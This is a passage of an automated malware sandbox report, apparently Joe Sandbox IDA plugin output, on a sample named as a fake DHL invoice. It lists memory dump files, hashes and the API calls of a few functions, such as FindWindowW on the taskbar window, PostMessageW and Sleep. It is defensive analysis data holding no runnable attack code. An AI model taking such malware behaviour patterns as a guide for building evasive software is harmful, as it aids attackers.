                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime
                                                                                                                        • String ID: %.3d$X64
                                                                                                                        • API String ID: 481472006-1077770165
                                                                                                                        • Opcode ID: 894534f987653bc3fd3e8896a851242a329b4f6071cb4465946ee8e782d5df67
                                                                                                                        • Instruction ID: 54f341bef324f242a3c5cf808e0d992840424539952f5f5773c7cac024ab7e69
                                                                                                                        • Opcode Fuzzy Hash: 894534f987653bc3fd3e8896a851242a329b4f6071cb4465946ee8e782d5df67
                                                                                                                        • Instruction Fuzzy Hash: 4BD01271808208F9CB52B6D0DC49CB9B3BCFB08301F608892F906D2880D624D5086761
                                                                                                                        Function 003C2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C232C
                                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003C233F
                                                                                                                          • Part of subcall function 0039E97B: Sleep.KERNEL32 ref: 0039E9F3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                        • Opcode ID: 69303dc77eb4bb709c23abc2a26de169ec0766ed836fa8dc4d6401db74f48c98
                                                                                                                        • Instruction ID: dab4a4ee6de4e8d93c9ff4417ac48dabb561287415caba183f92ebfe205aa43b
                                                                                                                        • Opcode Fuzzy Hash: 69303dc77eb4bb709c23abc2a26de169ec0766ed836fa8dc4d6401db74f48c98
                                                                                                                        • Instruction Fuzzy Hash: C6D012367A4310B7E665B771DC0FFD6BA189B40B14F005916F74AEA1D0C9F4B805CB54
                                                                                                                        Function 003C2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C236C
                                                                                                                        • PostMessageW.USER32(00000000), ref: 003C2373
                                                                                                                          • Part of subcall function 0039E97B: Sleep.KERNEL32 ref: 0039E9F3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                        • Opcode ID: 244e71142076a0ca28674325e2b4b8582da27e6eb8f90a28b0f8a384e8bf2f88
                                                                                                                        • Instruction ID: 97d73e884ce49b4719df8c014e665cdf139924e4f3d311793e8b9aded24cf457
                                                                                                                        • Opcode Fuzzy Hash: 244e71142076a0ca28674325e2b4b8582da27e6eb8f90a28b0f8a384e8bf2f88
                                                                                                                        • Instruction Fuzzy Hash: 39D0C9327913107AE666B7719C0FFC6A6189B45B14F005916B74AEA1D0C9A4B8058B58